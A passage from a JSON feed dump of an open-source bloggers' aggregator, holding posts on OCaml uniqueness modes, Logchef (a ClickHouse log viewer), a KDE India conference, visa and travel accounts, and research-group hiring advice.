consumes the unique reference; you can\nno longer produce a unique handle to the same reference and hence, you cannot\ncall free, get or set on this reference which has been freed.\n\n# let wont_work r =\n    free r;\n    get r\n  ;;\nError: This value is used here, but it has already been used as unique:\nLine 2, characters 7-8:\n\n\nModes.Aliased.t\nUniqueness applies deeply. If a value is marked as unique, then the transitive\nclosure of the reachable parts of the object is also expected to be unique. The\nreturn value of get is a pair, which is marked as unique1. Hence, both\nthe components of the pair are expected to be unique. However, we don’t want to\nimpose uniqueness of the value stored in the reference. The language allows\nparts of the value to be marked as aliased. Modes.Aliased.t is defined as:\n\nmodule Aliased : sig\n  type 'a t = { aliased : 'a @@ aliased } [@@unboxed]\nend\n\n\nThe language allows record fields to be annotated as aliased, while the record\nitself may be uniquely referenced.\nImplementation\nHere’s an implementation of that satisfies the signature.\n\nmodule M : S = struct\n  type 'a t = { mutable value : 'a }\n  let alloc x = { value = x }\n  let free t = ()\n  let get t =\n    let a = Modes.Aliased.{aliased = t.value } in\n    a, t\n  let set t x =\n    t.value \u003C- x;\n    t\nend\n\n\nThere’s nothing surprising about this implementation. Note that the compiler is\ndoing a lot of work behind the scenes to ensure that the functions do in fact\nsatisfy the uniqueness requirements. For example, if you change the\nimplementation of set to do something innocuous where the compiler cannot\nprove that the value is not aliased, the program no longer compiles:\n\n# let set t x =\n    t.value \u003C- x;\n    let t' = Fun.id t in (* compiler cannot prove [t'] is not aliased *)\n    t'\nError: \u003Csnip>\nValues do not match:\n val set : 'a t -> 'a -> 'a t\nis not included in\n val set : 'a t @ unique -> 'a -> 'a t @ unique\nThe type 'a t -> 'a -> 'a t is not compatible with the type\n 'a t @ unique -> 'a -> 'a t @ unique\n\n\nRefs that explain their work\nThe earlier blog\npost\nused polymorphic variants to encode the protocol of operations that are\npermitted on a ref cell. The implementation is reproduced below:\n\nmodule type Ref =\nsig\n  type ('a, 'b) ref constraint 'b = [>]\n\n  val ref   : 'a -> ('a, 'b) ref\n  val read  : ('a, [`Read of 'b]) ref\n              -> 'a * ('a, 'b) ref\n  val write : ('a, [`Write of 'b]) ref\n              -> 'a\n              -> ('a, 'b) ref\nend\nmodule Ref : Ref =\nstruct\n\n  type ('a, 'b) ref =\n    {contents     : 'a;\n     mutable live : bool} (* For linearity *)\n     constraint 'b = [>]\n\n  let ref v = {contents = v; live = true}\n\n  let check r =\n    if not r.live then raise LinearityViolation;\n    r.live \u003C- false\n\n  let fresh r = {r with live = true}\n\n  let read r =\n    check r;\n    (r.contents, fresh r)\n\n  let write r v =\n    check r;\n    { contents = v; live = true }\n\n  let branch r _ = check r; fresh r\nend\n\n\nObserve that we use a dynamic check to enforce linearity. It requires a fresh\nref cell for each operation performed on this reference. With uniqueness, we can\nenforce this statically, avoiding the dynamic check and the fresh ref cell\nrequirement.\n\nmodule type Ref =\nsig\n  type ('a, 'b) ref constraint 'b = [>]\n  (* 'b is the behavioural type variable *)\n\n  val ref   : 'a -> ('a, 'b) ref @ unique\n  val read  : ('a, [`Read of 'b]) ref @ unique\n              -> 'a Modes.Aliased.t * ('a, 'b) ref @ unique\n  val write : ('a, [`Write of 'b]) ref @ unique\n              -> 'a\n              -> ('a, 'b) ref @ unique\n  val branch : ('a, [>] as 'b) ref @ unique\n               -> (('a, [>] as 'c) ref @ unique -> 'b)\n               -> ('a, 'c) ref @ unique\nend\n\nmodule Ref : Ref =\nstruct\n  type ('a, 'b) ref = {mutable contents : 'a} constraint 'b = [>]\n\n  let ref v = {contents = v}\n\n  let read r =\n    let c = Modes.Aliased.{aliased = r.contents} in\n    c, Obj.magic_at_unique r\n\n  let write r v =\n    r.contents \u003C- v;\n    Obj.magic_at_unique r\n\n  let branch r _ = Obj.magic_at_unique r\nend\n\n\nThe only changes necessary in the signature were a number of uniqueness and\naliasing annotations. Notice that the implementation no longer needs the\ndynamic check! Obj.magic_at_unique has the type 'a @ unique -> 'b @ unique,\nand is the version of Obj.magic with uniqueness annotation. We use it to\nadvance the protocol type state.\nWhere next\nThe rest of the examples in the original\npost should also\nbenefit from uniqueness annotations to remove the runtime overheads.\nThe complete code examples are available\nhere.\nYou can also play with the code examples directly in the\nbrowser thanks to Patrick\nFerris’ OCaml with extensions\njs_of_ocaml top-level.\nSince the modes features are constantly evolving, there are no stability\nguarantees yet. However, I’m excited about the possibility of modes improving\nhow we do safe systems programming in OCaml.\nAddendum\nLooks like there’s a part 2 of this post.\nFootnotes\nUnclear whether it is possible to return a pair where one of the\ncomponents is unique, but the other one is not. ↩",[],{"slug":577,"title":578,"link":579,"pubDate":580,"contentSnippet":581,"tags":582,"maintainerName":38,"maintainerUsername":39,"maintainerPhoto":40,"feedUrl":41},"singapore-visa","Singapore Visa Process","https:\u002F\u002Fravidwivedi.in\u002Fposts\u002Fsingapore-visa\u002F","Tue, 27 May 2025 20:20:49 +0530","In November 2024, Badri and I applied for a Singapore visa to visit the country. To apply for a Singapore visa, you need to visit an authorized travel agent listed by the Singapore High Commission on their website. Unlike the Schengen visa (where only VFS can process applications), the Singapore visa has many authorized travel agents to choose from. I remember that the list mentioned as many as 25 authorized agents in Chennai. For my application, I randomly selected Ria International in Karol Bagh, New Delhi from the list.\nFurther, you need to apply not more than a month before your travel dates. As our travel dates were in December, we applied in the month of November.\nFor your reference, I submitted the following documents:\nPassport\nMy photograph (35 mm x 45 mm)\nVisa application form (Form 14A)\nCover letter to the Singapore High Commission, New Delhi\nProof of employment\nHotel booking\nFlight ticket (reservations are sufficient)\nBank account statement for the last 6 months\nI didn’t have my photograph in the specified dimensions, so the travel agent took my photo on the spot. The visa application was ₹2,567. Furthermore, I submitted my application on a Saturday and received a call from the travel agent on Tuesday informing me that they had received my visa from the Singapore High Commission.\nThe next day, I visit the travel agent’s office and picked up my passport and a black and white copy of my e-visa. Later, I downloaded a PDF of my visa from the website mentioned on it, and took a colored printout myself.\nSingapore granted me a multiple-entry visa for 2 months, even though I had applied for a 4-day single-entry visa. We were planning to add more countries to this trip; therefore, a multiple-entry visa would be helpful in case we wanted to use Singapore Airport, as it has good connectivity. However, it turned out that flights from Kuala Lumpur were much cheaper than those from Singapore, so we didn’t enter Singapore again after leaving.\nBadri also did the same process but entirely remotely—he posted the documents to the visa agency in Chennai, and got his e-visa in a few days followed by his original passport which was delivered by courier.\nHe got his photo taken in the same dimensions mentioned above, and printed as matte finish as instructed. However, the visa agents asked why his photo was looking so faded. We don’t know if they thought the matte finish was faded or what. To rectify this, Badri emailed them a digital copy of the photo to them (both the cropped version and the original) and they handled the reprinting on their end (which he never got to see).\nBefore entering Singapore, we had to fill an arrival card - an online form asking a few details about our trip - within 72 hours of our arrival in Singapore.\nThat’s it for now. Meet you in the next post.\nThanks to Badri for reviewing the draft.",[],{"slug":584,"title":585,"link":586,"pubDate":587,"contentSnippet":588,"tags":589,"maintainerName":410,"maintainerUsername":411,"maintainerPhoto":412,"feedUrl":413},"national-anthem","What the National Anthem?","https:\u002F\u002Fworkdone0.substack.com\u002Fp\u002Fnational-anthem","Sat, 24 May 2025 00:00:00 GMT","In the final episode of Game of Thrones, Tyrion Lannister asks a powerful question:",[],{"slug":591,"title":592,"link":593,"pubDate":594,"contentSnippet":595,"tags":596,"maintainerName":202,"maintainerUsername":203,"maintainerPhoto":204,"feedUrl":205},"mcp-seems-viral","MCP seems viral","https:\u002F\u002Fnadh.in\u002Fblog\u002Fmcp-seems-viral\u002F","Mon, 19 May 2025 00:00:00 +0000","MCP (Model Context Protocol)[1]\n is all the rage now. Introduced by Anthropic about four months ago, it has already been accepted as an open standard and has seen widespread adoption, including by major AI companies and prominent AI tool makers. There is even a directory[2]\n listing over 13,000 MCP implementations. Technically, it is a very simple API spec that facilitates RPC-like (Remote procedure call) communication between an AI and an external system. It enables any external system to advertise its capabilities—returning information or performing various actions—allowing AI systems to dynamically and “automagically” use those capabilities via API calls.",[],{"slug":598,"title":599,"link":600,"pubDate":601,"contentSnippet":602,"tags":603,"maintainerName":38,"maintainerUsername":39,"maintainerPhoto":40,"feedUrl":41},"kde-india-conference-2025","KDE India Conference 2025","https:\u002F\u002Fravidwivedi.in\u002Fposts\u002Fkde-india-conference-2025\u002F","Tue, 13 May 2025 23:28:18 +0530","Last month, I attended the KDE India conference in Gandhinagar, Gujarat from the 4th to the 6th of April. I made my mind to attend when Sahil told me about his plans to attend and giving a talk.\nA day after my talk submission, the organizer Bhushan contacted me on Matrix and informed me that my talk had been accepted. I was also informed that KDE will cover my travel and accommodation expenses. So, I planned to attend the conference at this point. I am a longtime KDE user, so why not ;)\nI arrived in Ahmedabad, the twin city of Gandhinagar, a day before the conference. The first thing that struck me as soon as I came out of the Ahmedabad airport was the heat. I felt as if I was being cooked—exactly how Bhushan put it earlier in the group chat. I took a taxi to get to my hotel, which was close to the conference venue.\nLater that afternoon, I met Bhushan and Joseph. Joseph lived in Germany. Bhushan was taking him to get a SIM card, so I tagged along and got to roam around. Joseph was unsure about where to go after the conference, so I asked him what he wanted out of his trip and had conversations along that line.\nLater, Vishal convinced him to go to Lucknow. Since he was adamant about taking the train, I booked a Tatkal train ticket for him to Lucknow. He was curious about how Tatkal booking works and watched me in amusement while I was booking the ticket.\nThe 4th of April marked the first day of the conference, with around 25 attendees. Bhushan started the day with an overview of KDE conferences in India, followed by Vishal, who discussed FOSS United’s activities. After the lunch, Joseph gave an overview of his campaign to help people switch from Windows to GNU\u002FLinux due to environmental and security reasons. He continued his session in detail the next day.\n\n      \nConference hall\nA key takeaway for me from Joseph’s session was the idea pointed out by Adwaith: marketing GNU\u002FLinux as a cheap alternative may not attract as much attention as marketing it as a status symbol. He gave the example of how the Tata Nano didn’t do well in the Indian market due to being perceived as a poor person’s car.\nMy talk was scheduled for the evening of the first day. I hadn’t prepared any slides because I wanted to make my session interactive. During my talk, I did an activity with the attendees to demonstrate the federated nature of XMPP messaging, of which Prav is a part. After the talk, I got a lot of questions, signalling engagement. The audience was cooperative (just like Prav ;)), contrary to my expectations (I thought they will be tired and sleepy).\nOn the third day, I did a demo on editing OpenStreetMap (referred to as “OSM” in short) using the iD editor. It involved adding points to OSM based on the students’ suggestions. Since my computer didn’t have an HDMI port, I used Subin’s computer, and he logged into his OSM account for my session. Therefore, any mistakes I made will be under Subin’s name. :)\nOn the third day, I attended Aaruni’s talk about backing up a GNU\u002FLinux system. This was the talk that resonated with me the most. He suggested formatting the system with the btrfs file system during the installation, which helps in taking snapshots of the system and provides an easy way to roll back to a previous version if, for example, a file is accidentally deleted. I have tried many backup techniques, including this one, but I never tried backing up on the internal disk. I’ll certainly give this a try.\nA conference is not only about the talks, that’s why we had a Prav table as well ;) Just kidding. What I really mean is that a conference is more about interactions than talks. Since the conference was a three-day affair, attendees got plenty of time to bond and share ideas.\n\n      \nPrav stall at the conference\n\n      \nConference group photo\nAfter the conference, Bhushan took us to Adalaj Stepwell, an attraction near Gandhinagar. Upon entering the complex, we saw a park where there were many langurs. Going further, there were stairs that led down to a well. I guess this is why it is called a stepwell.\n\n      \nAdalaj Stepwell\nLater that day, we had Gujarati Thali for dinner. It was an all-you-can-eat buffet and was reasonably priced at 300 rupees per plate. Aamras (Mango juice) was the highlight for me. This was the only time we had Gujarati food during this visit. After the dinner, Aaruni dropped Sahil and I off at the airport. The hospitality was superb - for instance, in addition to Aaruni dropping us, Bhushan also picked up some of the attendees from the airport.\nFinally, I would like to thank KDE for sponsoring my travel and accommodation costs.\nLet’s wrap up this post here and meet you in the next one.\nThanks to contrapunctus and Joseph for proofreading.",[],{"slug":605,"title":606,"link":607,"pubDate":608,"contentSnippet":609,"tags":610,"maintainerName":611,"maintainerUsername":612,"maintainerPhoto":613,"feedUrl":614},"encrypted-adns","Security And Encryption In Authoritative DNS","https:\u002F\u002Fshrirangkahale.com\u002Fposts\u002Fencrypted-adns\u002F","Sun, 11 May 2025 09:43:19 +0000","Internet as we know today, emerged from ARPANET, which was a research network made by the US DoD. Technologies like TCP\u002FIP formed the basis of ARPANET, being the the first network to use IP based communication.\nARPANET was eventually dissolved, but new networks were formed and with growing ideas and technology, The Internet was born.\nPeople to this date are reminiscent about the days of the dot-com bubble which was a period of rapid internet growth.",[],"Shrirang Kahale","albonycal","\u002Fimages\u002Falbonycal_photo.png","https:\u002F\u002Fshrirangkahale.com\u002Findex.xml",{"slug":616,"title":617,"link":618,"pubDate":619,"contentSnippet":620,"tags":621,"maintainerName":38,"maintainerUsername":39,"maintainerPhoto":40,"feedUrl":41},"paris","A visit to Paris","https:\u002F\u002Fravidwivedi.in\u002Fposts\u002Fparis\u002F","Tue, 06 May 2025 01:32:43 +0530","After attending the 2024 LibreOffice conference in Luxembourg, I visited Paris in October 2024.\nIf you are wondering whether I needed another visa to cross the border into France— I didn’t! Further, they are both also EU members, which means you don’t need to go through customs either. Thus, crossing the Luxembourg-France border is no different from crossing Indian state borders - like going from Rajasthan to Uttar Pradesh.\nI took a TGV train from Luxembourg Central Station, which was within walking distance from my hostel. The train took only 2 hours and 20 minutes to cover the 300 km distance to Paris. It departed from Luxembourg at 10:00 AM and reached Paris at 12:20 PM. The ride was smooth and comfortable, arriving on time. It gave me an opportunity to see the countryside of France. I booked the train ticket online a couple of days prior through the Omio website.\n\n      \nTGV train I rode from Luxembourg to Paris\nI planned the first day with my friend Joenio, whom I met upon arriving in Paris’ Gare de l’Est station, along with his wife Mari. We went to my hostel (which was within walking distance from the station) to store my luggage, but we were informed that we needed to wait for a couple of hours before I could check in. Consequently, we went to an Italian restaurant nearby for lunch, where I ordered pasta. My hostel was unbelievably cheap by French standards (25 euros per night) that Joenio was shocked when he learned about it.\n\n      \nPasta I had in Paris\nWalking in the city, I noticed it had separate cycling tracks and wide footpaths, just like Luxembourg. The traffic was also organized. For instance, there were traffic lights even for pedestrian crossings, unlike India, where crossing roads can be a nightmare. Car drivers stopping for pedestrians is a big improvement over what I am used to in India. The weather was also pleasant. It was a bit on the cooler side - around 15 degrees Celsius - and I had to wear a jacket.\n\n      \nA cycling track in Paris\nAfter lunch, we returned to my hostel for my check-in at around 3 o’clock. Then, we went to the Luxembourg Museum (Musée du Luxembourg in French) as Joenio had booked tickets for an exhibition of paintings by the Brazilian painter Tarsila do Amaral. To reach there, we took a subway train from Gare du Nord station. The Paris subway charges 2.15 euros irrespective of the distance (or number of stations) traveled, as opposed to other metro systems I have used.\nWe reached the museum at around 4 o’clock. I found the paintings beautiful, but I would have appreciated them much more if the descriptions were in English.\n\n      \nLuxembourg Museum\nAfterward, we went to a beautiful garden just behind the museum. It served as a great spot to relax and take pictures. Following this, we walked to the Pantheon - a well-known attraction in the city. It is a church built a couple of centuries ago. It has a dome-shaped structure at the top, recognizable from far away.\n\n      \nA shot of the park near to the Luxembourg Museum\n\n      \nPantheon, one of the attractions of Paris.\nThen we went to Notre Dame after having evening snacks and coffee at a nearby bakery. The Notre Dame was just over a kilometer from the Pantheon, so we took a walk. We also crossed the beautiful Seine river. On the way, I sampled a crêpe, a signature dish of France. The shop was named Crêperie and had many varieties of Crêpe. I took the one with eggs and Emmental cheese. It was savory and delicious.\n\n      \nPhoto with Joenio and Mari\n\n      \nNotre Dame, another tourist attraction of Paris.\nBy the time we reached Notre Dame, it was 07:30 PM. I learned from Joenio that Notre Dame was closed and being renovated due to a fire a couple of years ago, so we just sat around and clicked photos. It is a catholic cathedral built in French Gothic architecture (I read that on Wikipedia ;)). I read on Wikipedia that it is located on an island named Île de la Cité and I didn’t even realize we are on an island.\nAt night, we visited the most well-known attraction of Paris, The Eiffel Tower. We again took the subway, alighting at the Bir-Hakeim station, followed by a short walk. We reached the Eiffel Tower at 9 o’clock. It was lit bright yellow. There was not much to do there, so we just clicked photos and hung out. After that, I came back to my hostel.\n\n      \nMy photo with Eiffel Tower in the background\nNext day, I roamed around the city by walking mostly. France is known for its bakeries, so I checked out a couple of local bakeries. I had espresso a couple of times and sampled croissant, pain au chocolat and lemon meringue tartlet.\n\n      \nItems at a bakery in Paris. Items from left to right are: Chocolate Twist, Sugar briochette, Pain au Chocolat, Croissant with almonds, Croissant, Croissant with chocolate hazlenut filling.\nHere are some random shots:\n\n      \nThe Paris subway\n\n      \nInside a Paris subway\n\n      \nA random building and road in Paris\n\n      \nA shot near the Seine river\n\n      \nA view of the Seine river\nOn the third day, I had my flight for India. Thus, I checked out of the hostel early in the morning, took an RR train from Gare du Nord station to reach the airport. It costs 11.8 euros.\nI am listing my expenses during my 3-day stay in Paris below:\nCategory\nAmount (in euros)\n\n\n\n\nFood\n€40\n\n\nPublic Transport\n€20\n\n\nAccommodation (2 nights)\n€50\n\n\nTotal\n€110\n\n\n\nI heard some of my friends had bad experiences in France. Thus, I had the impression that I would not feel welcomed. Furthermore, I have encountered language problems during my previous Europe trip in Albania and Kosovo. Likewise, I learned a couple of French words, like how to say thank you and good morning, which went a long way.\nHowever, I didn’t have bad experiences in Paris, except for one instance in which I asked my hostel’s reception about my misplaced watch and the person at the reception asked me to be “polite” by being rude. She said, “Excuse me! You don’t know how to say Good Morning?”\nOverall, I enjoyed my time in Paris and would like to thank Joenio and Mari for showing me around. I would also like to thank Sophie for giving me a map of Paris, which was handy.\nLet’s end this post here. I’ll meet you in the next one!\nCredits: Thanks to contrapunctus for reviewing this post before publishing",[],{"slug":623,"title":624,"link":625,"pubDate":626,"contentSnippet":627,"tags":628,"maintainerName":349,"maintainerUsername":350,"maintainerPhoto":351,"feedUrl":352},"working-with-me","Joining my group","https:\u002F\u002Fkcsrk.info\u002Focaml\u002Fiitm\u002Fcommunity\u002F2025\u002F04\u002F28\u002Fworking-with-me\u002F","2025-04-28T12:10:00.000Z","Recently, I posted on X and\nLinkedIn\nthat I am always looking for excellent people to join my group. I received a lot\nof enquiries, some of which led to internship hires (yay!). But mostly, I seemed\nto offer similar advice. I thought I’d write a post that summarise my responses.\nAt IIT Madras, my research group develops\nprogramming language abstractions to solve systems problems. The group is\ncomposed of research associates (fixed-term project staff), PhD, MS and MTech\nstudents, undergraduate research students (who are typically BTech students from\nIIT Madars) and interns. I made the following post a few weeks ago, for which I\nreceived a lots of enquiries, and I have been busy writing similar responses to\nmany of them, which I summarise below.\nPSA: I'm always looking for excellent folks to join my research group at IIT Madras to work on building \"functional\" systems. This includes internships, MS and PhD studentships, research staff positions, and post-baccalaureate fellowships. \nReach out to me if you are keen!\n— KC Sivaramakrishnan (@kc_srk) April 15, 2025\n \n\n\nInternship positions\nInternship enquiries are the most frequent ones that I receive. Here’s how you\ncan make it work.  Please do go through my web page to\nlook at what areas I work on. Write to me about what interests you and what your\ngoals are.\nMy group works on systems. To make the internship work well, we require that you\nhave demonstrable systems building experience. Do build projects that go beyond\nyour coursework.  Make sure that the projects are developed publicly on GitHub\nor other similar platforms so that one can take a look at what you’ve\nbuilt. Even better is contributions to other open-source projects.\nThe group solves systems problems with functional programming. If you have prior\nexperience with functional programming, such as building small projects with\nOCaml, Haskell, Scala, Scheme or other languages, it is easier for me to assess\nyour interest. That said, if you are great at any programming language, having\nbuilt non-trivial projects in any language, then you have the right skills for\ninternships in my group. Generally, I expect the interns to have done course\nwork on OS, compilers and computer architecture. Significant projects in any of\nthose areas is a huge plus.\nI should clarify that my recommendation letters for graduate programs will\nreflect my honest assessment of the internship. I will decline writing a\nrecommendation letter if I think I may not be able to provide a strong one.\nI do not work on projects that are primarily AI\u002FML or Web Development. If you\nwrite to me looking for projects in those areas, it is very likely that you\nwon’t hear from me. Please don’t bulk email faculty CCing or BCCing everyone in\nthe department. It is likely that no one will read such an email.\nPhD\u002FMS\u002FMTech positions\nFor academic positions, please have a look at https:\u002F\u002Fresearch.iitm.ac.in\u002F.\nThere are alternative ways to enter MS and PhD positions by being a reserach\nassociate and completing some coursework at IITM. For more information, see\nhere.\nContributing to the OCaml community\nA significant chunk of the enquiries were from folks who hold full-time\npositions looking to be involved in the research group. Unfortunately, making\npart-time positions work is a challenge for both sides. I would encourage\ncontributions to the wider OCaml community.\nThere are several great ways to get involved with the community. Here’s what I\nusually recommend.\nLearn the basics.\n    \nGo through the OCaml part of my CS3100 course. The course has a YouTube\nplaylist and programming assignments. Complete the programming assignments.\nRead the Real World OCaml book.\nThere are lots of other resources at OCaml.org, the official website of the OCaml community and the ecosystem.\nJoin the community.\n    \nOCaml discord and discuss are great places to hang out with other OCaml folks and ask questions.\nDiscord is better for quick clarifications and discuss for longer form discussions.\nLook for “good first issues” in the OCaml projects and work on them\n    \nCheck out the core platform tools under the OCaml github org. See OCaml compiler, dune build system, opam package manager, ocaml.org, etc.\nAcross the wider ecosystem – SemGrep, OpenGrep, Rocq, etc.\nWork on self-directed projects. Here is my list of ideas.\nOCaml community also participates in Outreachy\ninternships. Outreachy internships are paid\ninternships for underrepresented groups. It is a great way to contribute to the\ncommunity while being mentored by folks from the OCaml community. Here’s a nice\nintro (in Tamil) to the\nimpact that Outreachy program had on an Outreachy intern. Look out for\nannouncements about\nOutreachy internships in the OCaml discuss forum.\nResearch Associate positions\nThis is for folks who want to contribute to the core research programme but do\nnot see themselves joining academic programs. The expectation here is that you\nare an experiened systems engineer, who should see themselves easily qualifying\nfor the internship positions in the group.\nOne useful way to look at this position is similar to a research software\ndevelopment engineer who helps build out the systems used for research or\ntranslate research to practice. In the past, research associates have helped\nupstream multicore\nOCaml.\nThe easiest way to get into this role would be to do an internship, see whether\nyou like this area, do well in the internship and then choose to apply to\nresearch associate position.\nAnother variant is a post-bacc or a pre-doc position aimed at highly motivated\nrecent graduates, who are looking to build research experience. The expectation\nhere is that we get papers into top venues in PL and Systems. For such students,\nI recommend going through my CS6225 Programs and Proofs\ncourse, watch the video\nlectures\nand complete the\nassignments.\nThe course is not an easy one, but will expose you to the broad area of PL and\nspecifically to deductive program verification. At the very least, you will come\nout with an understanding of what it is to think rigorously about program\ncorrectness.\nResearch associate positions are fixed-term positions. In order to make this\nwork, the tenure should be at least 18 months to make it work.\nSummary\nWhile I may not be hiring actively all the time, do reach out to me if you are\ninterested in any of hte above. Please follow me on\nLinkedIn,\nX or Bluesky,\nwhere I am likely to announce any open positions.",[],{"slug":630,"title":631,"link":632,"pubDate":633,"contentSnippet":634,"tags":635,"maintainerName":94,"maintainerUsername":95,"maintainerPhoto":96,"feedUrl":97},"announcing-logchef","Announcing Logchef","https:\u002F\u002Fmrkaran.dev\u002Fposts\u002Fannouncing-logchef\u002F","2025-04-27T00:00:00.000Z","So, for the last 3-4 months, I’ve been busy building Logchef. This tool basically grew straight out of my day job managing logs at Zerodha, where I’ve been managing logs for almost half a decade. I wanted to share a bit about how Logchef came to be.\nLike many, we journeyed through the complexities of ELK (a management nightmare) and found its OSS fork, OpenSearch, didn’t quite hit the mark for us either. We eventually found solid ground with Clickhouse, as detailed on our tech blog: Logging at Zerodha.\nChallenges Faced with Metabase#\nHowever, as I noted in that post, while Metabase served us well for analytics, it wasn’t the ideal UI specifically tailored for log analysis against Clickhouse:\n“While Metabase has served us well so far, there is certainly room for improvement, especially regarding a more tailored UI for Clickhouse… we plan to continue exploring potential solutions.”\nHere’s a distilled version of the common pain points we experienced:\nAd-hoc Querying Was Painful: Writing raw Clickhouse SQL in Metabase for quick log searches felt cumbersome and slow. Even modifying existing complex query templates was error-prone – a tiny syntax mistake could lead to minutes spent debugging the query itself, especially stressful during production incidents.\nDisconnect Between Visualization and Raw Logs: A common workflow is to visualize trends (e.g., errors over time) and then drill down into the specific logs causing those trends. In Metabase, this often meant writing two separate queries – one for aggregation\u002Fvisualization and another (often rewritten from scratch) just to see the raw log lines. Metabase’s row limits (around 2k) further complicated viewing the full context of raw logs after filtering.\nThe intuitive “slice and drill-down” experience many log tools offer was missing.\nUI\u002FUX Annoyances: Several smaller but cumulative issues added friction: difficulty selecting precise time ranges like “last 6 hours,” viewing logs immediately surrounding a relevant event, columns getting truncated (...), and limited timestamp precision display in results. Though there are some workarounds, they often felt like band-aids rather than solutions.\nTL;DR: Metabase interface wasn’t optimized for the specific task of log exploration. Debugging sessions that should have taken minutes were stretching significantly longer. Querying and exploring logs felt clunkier than it needed to be.\nAnd one fine day, I decided to stop just wishing for a better tool and start building one:\n\nLogchef#\nWhen I first started prototyping, I kept the scope pretty tight: just build a viewer for the standard OTEL schema. OTEL’s flexible enough, but a quick chat with Kailash  sparked what turned out to be a game-changing idea: make Logchef schema-agnostic. And that really became the core concept.\nBasically, Logchef lets you connect it straight to your existing Clickhouse log tables, no matter their structure. All it really needs is a timestamp field (DateTime or DateTime64). Bring your own custom schemas, stick with the OTEL standard, or even adapt it to your own needs. Logchef doesn’t force you into a specific format. From what I’ve seen, not many tools offer this kind of plug-and-play flexibility with existing tables today.\nLogchef is designed as a specialized query and visualization layer sitting on top of Clickhouse. Logchef intentionally excludes log collection and ingestion. Why reinvent the wheel when excellent tools like Vector, Fluentbit, Filebeat, etc., already handle this reliably? Logchef focuses purely on exploring the logs once it’s in Clickhouse.\nStack#\nBackend: Written in Go for performance and concurrency.\nMetadata Storage: Uses SQLite for lightweight management of users, teams, Clickhouse source connections, and query collections. It’s simple and perfectly suited for this kind of a metadata store.\nFrontend: An interactive log viewer with Vue.js and styled with shadcn\u002Fui and Tailwind CSS. I also implemented a simple search syntax for common filtering tasks (e.g., status=200 and path~\"\u002Fapi\u002F\"). This involved writing a tokenizer and parser that translates this syntax into efficient ClickHouse SQL conditions optimised for querying logs. Building this parser, validator, and integrating it smoothly with the Monaco editor for syntax highlighting was a significant effort but quite happy with the end result.\nSetting Up the Public Demo (demo.logchef.app)#\n\nI wanted a public demo instance so people could try Logchef easily. Setting this up involved a few specific tweaks compared to a standard deployment, all managed within the Docker Compose setup:\nGenerating Dummy Data: A log viewer isn’t much use without logs! Instead of ingesting real data, I configured vector using its demo_logs source type. This continuously generates realistic-looking syslog and HTTP access logs and pushes them into the demo Clickhouse instance (syslogs and http_logs tables). It gives users immediate data to query without any setup on their part.\n# vector.toml snippet\n[sources.generate_syslog]\ntype = \"demo_logs\"\nformat = \"syslog\"\ninterval = 0.3 # Generate logs frequently\n\n[sinks.clickhouse_syslog]\n# ... config to send to Clickhouse ...\ntable = \"syslogs\"\n\n\nSecuring Admin Endpoints (Demo Mode): Since this is a public, shared instance, I wanted to prevent users from making potentially disruptive changes via the API (like deleting sources or teams). I used Caddy as the reverse proxy and configured it to intercept requests to admin-specific API routes (like \u002Fapi\u002Fv1\u002Fadmin\u002F*) and block any method other than GET. If someone tries a POST, PUT, or DELETE to these endpoints, Caddy returns a 403 Forbidden directly. This keeps the demo environment stable.\nCaddyfile snippet (conceptual)\nhandle \u002Fapi\u002Fv1\u002Fadmin\u002F* {\n    @block_methods method POST PUT DELETE PATCH\n    respond @block_methods `{\"error\":\"Operation not permitted in demo mode\"}` 403\n    reverse_proxy logchef:8125 # Forward GET requests\n}\n\n\nImproving Demo Login UX: Logchef uses OIDC for authentication. For the demo, I’m running Dex as the OIDC provider. To make it completely frictionless for users, I didn’t want them needing to sign up or guess credentials. I simply customized Dex’s theme template for the login page to explicitly display the static demo username (demo@logchef.app) and password (password) right there. It’s a small UX tweak (again, thanks to Kailash for the idea!), but it means anyone landing on the demo can log in instantly.\n\u003C!-- Dex login template snippet -->\n\u003Cdiv class=\"dex-info-box\">\n  \u003Cstrong>Demo Credentials:\u003C\u002Fstrong>\u003Cbr>\n  Username: \u003Ccode>demo@logchef.app\u003C\u002Fcode>\u003Cbr>\n  Password: \u003Ccode>password\u003C\u002Fcode>\n\u003C\u002Fdiv>\n\u003Cinput ... value=\"demo@logchef.app\" ...\u002F>\n\u003Cinput ... type=\"password\" value=\"password\" ...\u002F>\n\n\nWhat’s Next?#\nLogchef is already being used internally, but the journey towards a full v1.0 release continues this year. The roadmap includes exciting additions like:\nAlerting: Trigger notifications based on query results.\nLive Tail Logs: Stream logs in real-time.\nEnhanced Dashboarding: More powerful visualization capabilities.\nLogchef is open source (AGPLv3), and community involvement is welcomed. You can check out the Demo or view the code on GitHub.\nIf you have more ideas or features you’d like to see, please reach out on GitHub or email me! I’m always open to suggestions and feedback.\nHonestly, building Logchef has been incredibly rewarding. It started as a way to fix something that bugged me (and others!), and seeing it turn into a tool I’m genuinely excited about feels great.\nI couldn’t have done it alone, though. I’m really grateful to my friends and colleagues who jumped in with feedback along the way. Huge thanks to Kailash for the constant support and encouragement, and to Vivek, Sarat, and Rohan for testing the early builds and offering great suggestions.\nFinally, a big thank you to my wife, who patiently endured my late-night coding sessions. Her support means the world to me \u003C3\nFin!",[],{"slug":637,"title":638,"link":639,"pubDate":640,"contentSnippet":641,"tags":642,"maintainerName":410,"maintainerUsername":411,"maintainerPhoto":412,"feedUrl":413},"motorcycle-engines","Inside the Machine: A Look at Motorcycle Engines","https:\u002F\u002Fworkdone0.substack.com\u002Fp\u002Fmotorcycle-engines","Sun, 27 Apr 2025 00:00:00 GMT","Peek under the hood as we explore how motorcycle engines work, what makes them tick, and why their engineering is so thrilling — from cylinders to spark plugs.",[],{"slug":644,"title":645,"link":646,"pubDate":647,"contentSnippet":648,"tags":649,"maintainerName":410,"maintainerUsername":411,"maintainerPhoto":412,"feedUrl":413},"cost-of-lies","The Cost of Lies","https:\u002F\u002Fworkdone0.substack.com\u002Fp\u002Fcost-of-lies","Wed, 23 Apr 2025 00:00:00 GMT","Every lie we tell ourselves—about our history, our neighbours, our ideals—demands a hidden tribute. This essay unpacks the stakes of self-deception in politics, society, and memory.",[],{"slug":651,"title":652,"link":653,"pubDate":654,"contentSnippet":655,"tags":656,"maintainerName":410,"maintainerUsername":411,"maintainerPhoto":412,"feedUrl":413},"feynman-letter","You, Still","https:\u002F\u002Fworkdone0.substack.com\u002Fp\u002Ffeynman-letter","Tue, 22 Apr 2025 00:00:00 GMT","A moving look at Richard Feynman’s letter to his late wife, revealing how love can persist in absence — raw, quiet, and deeply 